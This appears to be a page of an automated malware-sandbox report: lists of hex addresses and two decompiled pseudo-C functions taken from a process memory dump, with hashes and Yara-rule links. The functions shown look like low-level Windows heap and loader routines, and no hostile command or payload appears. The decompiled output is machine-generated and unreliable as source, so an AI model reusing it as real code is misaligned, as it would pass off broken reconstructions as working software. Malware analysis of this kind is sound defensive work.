0x0362d6c1
0x0362d6c1
0x0362d6c6
0x0367b36d
0x0367b36f
0x00000000
0x0367b375
0x0367b375
0x0367b375
0x00000000
0x0367b375
0x00000000
0x0362d6cc
0x0362d6d8
0x0362d6d8
0x0362d6d8
0x00000000
0x0362d6c6
0x0362d6bf
0x00000000
0x0362d6da
0x0362d6da
0x0362d716
0x0362d71b
0x0362d720
0x0362d726
0x0362d726
0x0362d72d
0x00000000
0x0362d733
0x0362d739
0x0362d742
0x0362d750
0x0362d758
0x0362d764
0x0362d776
0x0362d77a
0x0362d783
0x0362d928
0x0362d92c
0x0362d93d
0x0362d944
0x0362d94f
0x0362d954
0x0362d956
0x0362d95f
0x0362d961
0x0362d973
0x0362d973
0x0362d956
0x0362d944
0x0362d92c
0x0362d78b
0x0367b394
0x0362d791
0x0362d798
0x0367b3a3
0x0367b3bb
0x0367b3bb
0x0362d7a5
0x0362d866
0x0362d870
0x0362d884
0x0362d892
0x0362d898
0x0362d89e
0x0362d8a0
0x0362d8a6
0x0362d8ac
0x0362d8ae
0x0362d8b4
0x0362d8b4
0x0362d8ae
0x0362d7a5
0x0362d78b
0x0362d7b1
0x0367b3c5
0x0367b3c5
0x0362d7c3
0x0362d7ca
0x0362d7e5
0x0362d7eb
0x0362d8eb
0x0362d8ed
0x00000000
0x0362d8f3
0x0362d8f3
0x0362d8f3
0x00000000
0x0362d8ed
0x0362d7cc
0x0362d7cc
0x0362d7d2
0x00000000
0x0362d7d4
0x0362d7d4
0x0362d7d7
0x0362d7df
0x0367b3d4
0x0367b3d9
0x0367b3dc
0x0367b3dc
0x0367b3df
0x0367b3e2
0x0367b468
0x0367b46d
0x0367b46f
0x0367b46f
0x0367b475
0x0362d8f8
0x0362d8f9
0x0362d8fd
0x0367b3e8
0x0367b3e8
0x0367b3eb
0x0367b3ed
0x00000000
0x0367b3ef
0x0367b3ef
0x0367b3f1
0x0367b3f4
0x0367b3fe
0x0367b404
0x0367b409
0x0367b40e
0x0367b410
0x0367b410
0x0367b414
0x0367b414
0x0367b41b
0x0367b420
0x0367b423
0x0367b425
0x0367b427
0x0367b42a
0x0367b42d
0x0367b42d
0x0367b42a
0x0367b432
0x0367b436
0x0367b438
0x0367b43b
0x0367b43b
0x0367b449
0x0367b44e
0x0367b454
0x0367b458
0x0367b458
0x0367b45d
0x00000000
0x0367b45d
0x0367b3ed
0x00000000
0x00000000
0x00000000
0x0362d7df
0x0362d7d2
0x0362d7ca
0x0367b37c
0x0367b37e
0x0367b385
0x0367b38a
0x00000000
0x0367b38a
0x0362d742
0x0362d7f1
0x0362d7f8
0x0367b49b
0x0367b49b
0x0362d800
0x0362d837
0x0362d843
0x0362d845
0x0362d847
0x0362d84a
0x0362d84b
0x0362d84e
0x0362d857
0x0362d802
0x0362d802
0x0362d80d
0x00000000
0x0362d818
0x0362d818
0x0362d824
0x0362d831
0x0367b4a5
0x0367b4ab
0x0367b4b3
0x0367b4b8
0x0367b4bb
0x00000000
0x0367b4c1
0x0367b4c1
0x0367b4c8
0x00000000
0x0367b4ce
0x0367b4d4
0x0367b4e1
0x0367b4e3
0x0367b4e5
0x00000000
0x0367b4eb
0x0367b4f0
0x0367b4f2
0x0362dac9
0x0362dacc
0x0362dacf
0x0362dad1
0x0362dd78
0x0362dd78
0x0362dcf2
0x00000000
0x0362dad7
0x0362dad9
0x0362dadb
0x00000000
0x00000000
0x0362dae1
0x0362dae1
0x0362dae4
0x0362dae6
0x0367b4f9
0x0367b4f9
0x0367b500
0x0362daec
0x0362daec
0x0362daf5
0x0362daf8
0x0362dafb
0x0362db03
0x0362db11
0x0362db16
0x0362db19
0x0362db1b
0x0367b52c
0x0367b531
0x0367b534
0x0362db21
0x0362db21
0x0362db24
0x0362dcd9
0x0362dce2
0x0362dce5
0x0362dd6a
0x0362dd6d
0x00000000
0x0362dd73
0x0367b51a
0x0367b51c
0x0367b51f
0x0367b524
0x00000000
0x0367b524
0x0362dce7
0x0362dce7
0x0362dce7
0x00000000
0x0362dce7
0x00000000
0x0362db2a
0x0362db2c
0x0362db31
0x0362db33
0x0362db36
0x0362db39
0x0362db3b
0x0362db66
0x0362db66
0x0362db3d
0x0362db3d
0x0362db3e
0x0362db46
0x0362db47
0x0362db49
0x0362db4c
0x0362db53
0x0362db55
0x0362db58
0x0362db5a
0x0367b50a
0x0367b50f
0x0367b512
0x0362db60
0x0362db60
0x0362db63
0x0362db63
0x00000000
0x0362db63
0x0362db5a
0x0362db3b
0x0362db24
0x0362db69
0x0362db69
0x0362db6c
0x0362db6f
0x0362db74
0x0367b557
0x0367b557
0x0367b55e
0x0362db7a
0x0362db7c
0x0362db7f
0x0362db82
0x0362db85
0x00000000
0x0362db8b
0x0362db8b
0x0362db8d
0x0362db9b
0x0362db9b
0x0362db9d
0x0362dba0
0x0362dba2
0x0362dba4
0x0362dba7
0x0362dba9
0x0362dbae
0x0362dbae
0x0362dbb1
0x0362dbb4
0x0362dbb4
0x0362dbb7
0x0362dbba
0x0362dcd2
0x0362dcd4
0x00000000
0x0362dbc0
0x0362dbc0
0x0362dbd2
0x0362dbd7
0x0362dbda
0x0362dbdd
0x0362dbdf
0x00000000
0x0362dbe5
0x0362dbe5
0x0362dbee
0x0362dbf1
0x0367b541
0x0367b544
0x00000000
0x0367b546
0x0367b546
0x00000000
0x0367b546
0x0362dbf7
0x0362dbf7
0x0362dbfd
0x0362dbfd
0x0362dbff
0x0362dc0b
0x0362dc15
0x0362dc1b
0x0362dc1d
0x0362dc21
0x0362dc21
0x0362dc23
0x0362dc23
0x0362dc26
0x0362dc29
0x0362dc2b
0x00000000
0x00000000
0x0362dc31
0x0362dc34
0x0362dc36
0x0362dcbf
0x0362dcbf
0x0362dcc2
0x00000000
0x0362dc3c
0x0362dc41
0x0362dc43
0x00000000
0x0362dc45
0x0362dc45
0x0362dc47
0x00000000
0x0362dc4d
0x0362dc4d
0x0362dc50
0x0362dc52
0x0362dc55
0x0362dcfa
0x0362dcfe
0x0362dd08
0x0362dd0a
0x0362dd0c
0x00000000
0x0362dd12
0x0362dd15
0x0362dd2d
0x0362dd2f
0x0362dd32
0x0362dd35
0x00000000
0x0362dd35
0x0362dc5b
0x0362dc5b
0x0362dc5e
0x0362dc61
0x0362dc64
0x0362dc67
0x0362dc67
0x0362dc6a
0x0362dc6c
0x0362dc8e
0x0362dc8e
0x0362dc91
0x0362dc93
0x0362dcce
0x0362dcce
0x0362dc95
0x0362dc9c
0x0362dc6e
0x0362dc72
0x0362dc75
0x0362dc77
0x0362dc79
0x0367b551
0x0367b551
0x00000000
0x0362dc7f
0x0362dc7f
0x0362dc81
0x00000000
0x0362dc83
0x0362dc86
0x0362dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0362dc88
0x0362dc81
0x0362dc79
0x0362dc6c
0x0362dc55
0x0362dc47
0x0362dc43
0x00000000
0x0362dc36
0x0362dc23
0x00000000
0x0362dbff
0x0362dbf1
0x0362dbdf
0x0362db8f
0x0362db92
0x0362db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0362db95
0x0362db8d
0x0362db85
0x0362db74
0x0362dc9f
0x0362dca2
0x0362dcb0
0x0362dcb0
0x0362dad1
0x0367b4e5
0x0367b4c8
0x00000000
0x00000000
0x00000000
0x0362d831
0x0362d80d
0x00000000
0x0362d800
0x0367b47f
0x0367b485
0x00000000
0x0367b485
0x0362d665
0x0362d652
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d98bd2771c08807dba787025e91b6275771bc46c0d1455ab6f10d4896315242
Instruction ID: a4199a4e347e85354cbccf3303ab5e52281b2fb65a634eedf8ae7c2be98dcfff
Opcode Fuzzy Hash: 8d98bd2771c08807dba787025e91b6275771bc46c0d1455ab6f10d4896315242
Instruction Fuzzy Hash: A3E1E634A00B69CFDB24DF24CA44BA9BBB5BF45314F0A41E9D8199B390DB78AD81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0362849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0362849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x36ef9c0);
				E0366D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3707b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0362CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03632280( *[fs:0x30], 0x3708550);
						_t139 =  *0x3707b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0364F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0362FFB0(_t193, _t235, 0x3708550);
								L5:
								return E0366D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03611C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3707b9c; // 0x0
							_t235 = L03634620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3707b10; // 0x9
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0364A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0362FFB0(_t193, _t235, 0x3708550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L036377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L036377F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3707b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3707b10; // 0x9
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E036537C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3707b9c; // 0x0
									_t214 = L03634620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E036537F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3707b10 =  *0x3707b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3707b04 =  *0x3707b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L036377F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L036377F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3707b08 =  *0x3707b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E036557C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0365F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L036377F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0364A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L036377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E036596C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0362849b
0x0362849b
0x0362849b
0x0362849b
0x0362849d
0x036284a2
0x036284a7
0x036284b1
0x036284d8
0x00000000
0x036284b3
0x036284c4
0x036284c9
0x036284cd
0x036284cf
0x036284cf
0x036284d6
0x036284e6
0x036284e9
0x036284ec
0x036284ef
0x036284f2
0x036284f4
0x036284fc
0x03628501
0x03628506
0x03628509
0x036286e0
0x036286e5
0x036286e8
0x036286ed
0x036286f0
0x036286f2
0x03679afd
0x03679b02
0x036284da
0x036284df
0x036284df
0x036286fa
0x036286fd
0x036286fe
0x03628701
0x03628706
0x03628709
0x0362870b
0x00000000
0x00000000
0x03628711
0x03628725
0x03628727
0x0362872a
0x0362872c
0x03679af0
0x03679af5
0x03628732
0x03628732
0x03628732
0x03628735
0x03628737
0x03628515
0x03628515
0x03628518
0x0362851d
0x03628523
0x03628527
0x0362852b
0x03628537
0x03628539
0x0362853c
0x0362853e
0x0362868c
0x03628691
0x03628699
0x0362869b
0x03628744
0x03628748
0x036286a1
0x036286a1
0x036286a1
0x036286a4
0x036286a8
0x03679bdf
0x03679bdf
0x036286ae
0x036286b0
0x00000000
0x036286b6
0x00000000
0x03679be9
0x036286b0
0x03628544
0x0362854a
0x0362854d
0x03628551
0x0362876e
0x03628778
0x0362877b
0x03628780
0x03628557
0x03628557
0x0362855d
0x0362855d
0x0362856b
0x0362856e
0x03628570
0x03628573
0x03628576
0x03628576
0x03628579
0x0362857b
0x00000000
0x00000000
0x03628581
0x036285a0
0x036285a2
0x036285a5
0x036285a7
0x03679b1b
0x03679b1b
0x0362862e
0x0362862e
0x03628631
0x03628631
0x03628634
0x03628636
0x03628669
0x03628669
0x0362866b
0x03679bbf
0x03679bc4
0x03679bc8
0x03679bce
0x03679bce
0x03628671
0x03628671
0x03628674
0x03628676
0x03679bae
0x03679bae
0x03628676
0x0362867c
0x0362867e
0x03628688
0x03628688
0x00000000
0x0362867e
0x03628638
0x03628638
0x0362863b
0x0362863e
0x0362863f
0x03628642
0x03628645
0x03628648
0x0362864d
0x03679b69
0x03679b6e
0x03679b7b
0x03679b81
0x03679b85
0x03679b89
0x03679ba7
0x03679b8b
0x03679b91
0x03679b9a
0x03679b9f
0x03679b9f
0x03628788
0x0362878d
0x03628763
0x03628763
0x03628766
0x00000000
0x03628766
0x03679b70
0x00000000
0x03679b70
0x03628656
0x0362865a
0x0362865c
0x03628752
0x03628756
0x00000000
0x00000000
0x0362875e
0x00000000
0x0362875e
0x03628662
0x03628662
0x03628662
0x03628666
0x00000000
0x03628666
0x036285b7
0x036285b9
0x036285bc
0x036285bf
0x036285cc
0x036285d1
0x036285d4
0x036285db
0x036285de
0x036285e0
0x03679b5f
0x00000000
0x03679b5f
0x036285e6
0x036285ea
0x036286c3
0x036286c5
0x036286c8
0x036286ca
0x03679b16
0x00000000
0x03679b16
0x036286d6
0x036285f6
0x036285f6
0x036285f9
0x03628602
0x03628606
0x0362860a
0x0362860b
0x0362860e
0x03628611
0x00000000
0x03628611
0x036285f3
0x00000000
0x036285f3
0x03628619
0x0362861e
0x0362861e
0x03628621
0x03628622
0x03628623
0x03628625
0x0362862c
0x00000000
0x0362873d
0x00000000
0x0362873d
0x03628737
0x0362850f
0x03628512
0x00000000
0x03628512
0x00000000
0x036284d6

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c34c859b781139ec8097ff514e4712cc5f6178e31f7737fed76cee9125287b41
Instruction ID: c7b619f7b1f25d30476b6544f151a04eda14d283ac91c5167e378f8c1e914cde
Opcode Fuzzy Hash: c34c859b781139ec8097ff514e4712cc5f6178e31f7737fed76cee9125287b41
Instruction Fuzzy Hash: 1BB148B4E00769DFDB14DFA8C984AAEBBF9BF49704F154129E405AB345DB70A842CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0364513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0364513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x370d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0365D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03632280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03634620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0365F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0362FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x370b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0365B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x03645142
0x0364514c
0x03645150
0x03645157
0x03645159
0x0364515e
0x03645165
0x03645169
0x0364516c
0x03645172
0x03645176
0x0364517a
0x0364517a
0x0364517a
0x0364517f
0x03686d8b
0x03686d8e
0x03686d91
0x03686d95
0x03686d98
0x03686d9c
0x03686da0
0x03686da3
0x03686da7
0x03686e26
0x03686e26
0x03686e2a
0x036451f9
0x036451f9
0x036451fe
0x03686e33
0x03686e33
0x03686e39
0x03686e3d
0x03686e46
0x03686e50
0x00000000
0x00000000
0x03686e52
0x03686e53
0x03686e56
0x03686e5d
0x00000000
0x00000000
0x00000000
0x03686e5f
0x03686e67
0x03686e77
0x03686e7f
0x03686e80
0x03686e88
0x03686e90
0x03686e9f
0x03686ea5
0x03686ea9
0x03686eb1
0x03686ebf
0x00000000
0x00000000
0x03686ecf
0x03686ed3
0x00000000
0x00000000
0x03686edb
0x03686ede
